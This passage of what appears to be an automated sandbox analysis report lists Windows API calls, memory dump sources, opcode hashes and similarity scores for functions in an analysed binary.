                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                              • Instruction ID: 4b3857737dd17f2a3eadb6bbc78d664c74ec5593d7e261864ce8b88e254c7fd9
                                                                                              • Opcode Fuzzy Hash: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                              • Instruction Fuzzy Hash: F941D1B1904321CFDB24DF15F58486AB7E6FFD4311F1C8A2DEA8583261E778ED448A91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00721E55
                                                                                                • Part of subcall function 00723BBA: __EH_prolog.LIBCMT ref: 00723BBF
                                                                                              • _wcslen.LIBCMT ref: 00721EFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                              • Instruction ID: 692a5524c0d33b40eb7aa5c8425a48b3b745eb9bc3f35b67fd4eb69f46346cf4
                                                                                              • Opcode Fuzzy Hash: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                              • Instruction Fuzzy Hash: DB314B71905219DFDF15EF98D949AEEFBF6BF58300F6000A9E845A7251C73A5E00CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007273BC,?,?,?,00000000), ref: 00729DBC
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00729E70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                              • Instruction ID: 1a62628f1d2138f256cb8baf570309c8cac28b204b3236b824cf2ea2b52cc20d
                                                                                              • Opcode Fuzzy Hash: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                              • Instruction Fuzzy Hash: AB21F032248355EBC714CF34D891AABBBE4AF51704F08481CF5C583581D32DE90C9BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00729F27,?,?,0072771A), ref: 007296E6
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00729F27,?,?,0072771A), ref: 00729716
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                              • Instruction ID: c84dbc25079a832fa0836633e22bae32a3f15d0f53cfab400dc5f2c142a5713c
                                                                                              • Opcode Fuzzy Hash: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                              • Instruction Fuzzy Hash: 5C21BDB1104354AEE3708A65DC89FA7B7DCEB49360F044A19FA96C65D2C7B8A8848671
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00729EC7
                                                                                              • GetLastError.KERNEL32 ref: 00729ED4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                              • Instruction ID: cf141fb33ffae7d850fe4ec17f7c908652f3c4040b1b4cfeec97c52057153dec
                                                                                              • Opcode Fuzzy Hash: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                              • Instruction Fuzzy Hash: A8112931A003209BD724C624D844BA6B3E9AB04370F584A29E653D25D0D378ED45C760
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00748E75
                                                                                                • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00761098,007217CE,?,?,00000007,?,?,?,007213D6,?,00000000), ref: 00748EB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                              • Instruction ID: 08ca70a93ca3b49293cb8b3aca65591e495ada77a9327a0cfc1887a2d15971e9
                                                                                              • Opcode Fuzzy Hash: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                              • Instruction Fuzzy Hash: 10F0F63270123DE6CBA12A259C08F6F37588F82B70F244126F814AB1A1DF7DCD0081A3
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 007310AB
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 007310B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                              • Instruction ID: 41b39563e812a990cc8248ee986de164608fe688eda5700eb684c3d579a8af07
                                                                                              • Opcode Fuzzy Hash: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                              • Instruction Fuzzy Hash: 7AE0D833B00249A7DF0D87B49C059EB73DEEA44345B508175E407E7102F978DE418A60
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                                • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                              • Instruction ID: cba96f5776b4c33538940a56fe0a7accbad1e3d2c4d9cc82b31a9c2d31e0c5fe
                                                                                              • Opcode Fuzzy Hash: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                              • Instruction Fuzzy Hash: 44F03031240319BBDF025F61EC45FDA376DAB04385F448451B949D51A0DB75DA94DA50
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641,000000FF), ref: 0072A1F1
                                                                                                • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641), ref: 0072A21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                              • Instruction ID: 79aaabc7f9f9e2ce148925b8ea89e277b2d254c419d97f9ebd9abcb2c3301f4f
                                                                                              • Opcode Fuzzy Hash: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                              • Instruction Fuzzy Hash: E3E09271140319BBEB015F60EC45FE9379CBB083C2F488021B948D20A0EB6ADE84DA64
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00752641,000000FF), ref: 0073ACB0
                                                                                              • OleUninitialize.OLE32(?,?,?,?,00752641,000000FF), ref: 0073ACB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: eb2b9a54fc29aa3b98b1fd11e3744021618468e749974aef49012dd9c0516a77
                                                                                              • Instruction ID: 9034b1d9ab03e654113798994393d5fdc73ed9380af6dd4dabee27f42cd21f46
                                                                                              • Opcode Fuzzy Hash: eb2b9a54fc29aa3b98b1fd11e3744021618468e749974aef49012dd9c0516a77
                                                                                              • Instruction Fuzzy Hash: 16E06572544A50EFC7019F5DDC46B45FBA8FB48F61F104365F416D3BA1CB786801CA94
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A254
                                                                                                • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A280
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 601ed5c7c0d26c8c25ca94987f67d76d46da0b16703cd388c6548fd323f8274d
                                                                                              • Instruction ID: 5ae3e1a2b0fb63d4201c8e6269cadd76eb00de1bedcd54b7dc5bbef19a03d272
                                                                                              • Opcode Fuzzy Hash: 601ed5c7c0d26c8c25ca94987f67d76d46da0b16703cd388c6548fd323f8274d
                                                                                              • Instruction Fuzzy Hash: 3EE09271500224ABCB10AB64DC09BD97798AB083E2F048261FD48E31E0D778DE44CAA0
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0073DEEC
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0073DF03
                                                                                                • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                                • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                                • Part of subcall function 0073B568: IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
                                                                                                • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                                • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: 5d23a27a2beb18cda777c4115fc134e3ec6e8877686bcce1213a946570073134
                                                                                              • Instruction ID: e9d2e10288ea8dccf6c52e76392594baebec2e8de8f0c5d20bee98c4a891d019
                                                                                              • Opcode Fuzzy Hash: 5d23a27a2beb18cda777c4115fc134e3ec6e8877686bcce1213a946570073134
                                                                                              • Instruction Fuzzy Hash: F0E09BB140035866EF11AB65DC0EF9E3B6C5B05785F044551B601DA0E3D97CD6508766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Opcode ID: 6ca5108a91eea07a47f6ee6ef45d7a28f66b1f743378966ae3b7211152f36c85
• Instruction ID: 562adc55722b91d9543348f7443dad170f70e5512cd24207f1d78248e56db58e
• Opcode Fuzzy Hash: 6ca5108a91eea07a47f6ee6ef45d7a28f66b1f743378966ae3b7211152f36c85
• Instruction Fuzzy Hash: F9E048B6500228ABDB11A795DC09FDA77ACEF093D2F044065B649D2055DABCDA84CBF4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0073A3E1
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: BitmapCreateFromGdipStream
• String ID:
• API String ID: 1918208029-0
• Opcode ID: 2eb21c46ee51cfbce03a22da80308ab781c0abaa722f3c536278f6a3588dbffd
• Instruction ID: 79b2f97575f0c769d339684886a3dc9e9dbe802d70e90130bb9bc2ad6ee4fed9
• Opcode Fuzzy Hash: 2eb21c46ee51cfbce03a22da80308ab781c0abaa722f3c536278f6a3588dbffd
• Instruction Fuzzy Hash: 8CE0EDB2900218EBDB10DF55C545B9DBBE8EB14365F10845AA88693242E3B8AE44DB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00742BAA
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00742BB5
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptd
• String ID:
• API String ID: 1660781231-0
• Opcode ID: 07dc4bd2ea21ae8b26f7764305f406a54f10f3b91b4a8a46ca0b2e8084df71ae
• Instruction ID: 0097eedb81c52abda02b9db1d8669125511a8d37facbb348df11c2f0539a3149
• Opcode Fuzzy Hash: 07dc4bd2ea21ae8b26f7764305f406a54f10f3b91b4a8a46ca0b2e8084df71ae
• Instruction Fuzzy Hash: F9D0A7F4694300944C542E70390A4642745DD417757E04696F430858C3FB5C8053D119
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
• Opcode ID: 4f4ee27aa5e4233efba1266e91e945473e5286fed5ea5ad50ba186147f2b7bd9
• Instruction ID: b8ea51faebf2f2b7fbe60df07771f5797faff18ec391fdef41ea2cf9635917d1
• Opcode Fuzzy Hash: 4f4ee27aa5e4233efba1266e91e945473e5286fed5ea5ad50ba186147f2b7bd9
• Instruction Fuzzy Hash: 6DC0123289C608BECB010BB8DC0DC2BBBA8ABA5B12F24C908B0A5C0060E23CC110DB11
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 60e38544c5140dd777f2505f46e724a76a63bcd075357ac0f8b82f1780d3adbe
• Instruction ID: ce392b411794af8b110d702af50047a509c27ac7f920e5364557dbd5c677b070
• Opcode Fuzzy Hash: 60e38544c5140dd777f2505f46e724a76a63bcd075357ac0f8b82f1780d3adbe
• Instruction Fuzzy Hash: FBC1E370A00264DFEF15CF28D498BA97BB5BF29310F4841B9EC459B396DB389944CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 50fd62d638450a44173809733a4baa6e25f312f0e1f8916ff8e52a1ccf23a18a
• Instruction ID: 94a8a1a4b0e010a29eac262d803d30d48e2c15b3a27b23a6005c33ba78357b54
• Opcode Fuzzy Hash: 50fd62d638450a44173809733a4baa6e25f312f0e1f8916ff8e52a1ccf23a18a
• Instruction Fuzzy Hash: ED71F571500B94DEDB35DB70D8499E7B7E9AF14300F41092EF2AB87242DA3E6A88CF11
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00728289
  • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
  • Part of subcall function 0072A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog$CloseFind
• String ID:
• API String ID: 2506663941-0
• Opcode ID: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
• Instruction ID: ca0473e300d949835e80a01aafb6c13adbe4f5e2ec7d96ab6497bb3ca089f195
• Opcode Fuzzy Hash: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
• Instruction Fuzzy Hash: DB41B871945668DADB20EB60DC59AEEB3B8BF10304F4404EBE14A57083EB795FC5CB51
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 007213E1
  • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
  • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
  • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
• Instruction ID: 979f42b91b62af22fc69bfa6a0b135a87016bd7abcb1f0a40a14d3b91579e321
• Opcode Fuzzy Hash: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
• Instruction Fuzzy Hash: 23415DB0905B40DEE724DF398889AE6FBE5BF28300F50492EE5FE87282C7356654CB10
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 007213E1
  • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
  • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
  • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
Memory Dump Source
